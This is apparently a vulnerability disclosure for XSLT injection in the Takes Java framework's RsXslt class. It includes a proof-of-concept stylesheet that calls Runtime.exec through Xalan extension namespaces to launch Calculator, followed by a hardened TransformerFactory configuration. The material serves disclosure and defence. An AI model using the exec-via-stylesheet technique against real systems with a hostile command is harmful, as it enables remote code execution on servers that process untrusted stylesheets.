The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in the XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.
```java
package org.example;

import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;

import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class SimpleTakesApp {
    public static void main(String[] args) throws IOException {
        // XML page that references an external stylesheet.
        final Text xml = new Joined(
            " ",
            "<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
            "<page><data>ура</data></page>"
        );
        // Stylesheet that reaches Java through the Xalan extension namespaces;
        // an unsecured transformer executes it as part of the transformation.
        final Text xsl = new Joined(
            " ",
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
            "  <xsl:template match=\"/\">\n" +
            "    <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
            "    <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
            "    <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
            "    <xsl:value-of select=\"$processString\"/>\n" +
            "  </xsl:template>\n" +
            "</xsl:stylesheet>"
        );
        // RsXslt resolves the stylesheet through the supplied URIResolver and
        // applies it without secure processing enabled.
        String transformedValue = IOUtils.toString(
            new RsXslt(
                new RsText(new InputStreamOf(xml)),
                (href, base) -> new StreamSource(new InputStreamOf(xsl))
            ).body(),
            StandardCharsets.UTF_8
        );
        System.out.println(transformedValue);
    }
}
```
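For comparison, the following is an added example (not code from this issue or from the Takes project) of the `TransformerFactory` configuration whose absence the report describes: secure processing plus external-access restrictions, applied before a stylesheet is compiled. It assumes the JDK's built-in XSLTC processor; the `sys:getProperty` extension call is a constructed, harmless stand-in for the kind of Java call a hostile stylesheet would attempt.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import java.io.StringWriter;

// Added example (assumes the JDK's built-in XSLTC processor); not Takes code.
public class HardenedXsltExample {
    // Factory that refuses Java extension functions and external resource fetches.
    static TransformerFactory secureFactory() throws TransformerException {
        final TransformerFactory factory = TransformerFactory.newInstance();
        // Disables extension functions such as the xalan/java/... namespaces.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Blocks xsl:import, xsl:include and document() from external URIs.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return factory;
    }
    static String transform(String xml, String xsl) throws TransformerException {
        final Transformer transformer = secureFactory()
            .newTransformer(new StreamSource(new StringReader(xsl)));
        final StringWriter out = new StringWriter();
        transformer.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }
    public static void main(String[] args) throws TransformerException {
        final String xml = "<page><data>ура</data></page>";
        // Constructed stylesheet calling a (harmless) Java extension function.
        final String untrusted = "<xsl:stylesheet version=\"1.0\""
            + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
            + " xmlns:sys=\"http://xml.apache.org/xalan/java/java.lang.System\">"
            + "<xsl:template match=\"/\"><xsl:value-of select=\"sys:getProperty('user.name')\"/>"
            + "</xsl:template></xsl:stylesheet>";
        try {
            System.out.println(transform(xml, untrusted));
        } catch (TransformerException e) {
            // With secure processing on, the extension call is refused.
            System.out.println("rejected: " + e.getMessage());
        }
        // A plain stylesheet with no extension calls still transforms normally.
        final String plain = "<xsl:stylesheet version=\"1.0\""
            + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
            + "<xsl:template match=\"/\"><xsl:value-of select=\"/page/data\"/>"
            + "</xsl:template></xsl:stylesheet>";
        System.out.println(transform(xml, plain));
    }
}
```

If a third-party XSLT implementation is on the classpath, `setAttribute` may reject the `ACCESS_EXTERNAL_*` keys with an `IllegalArgumentException`, so the configuration should be verified against the processor actually in use.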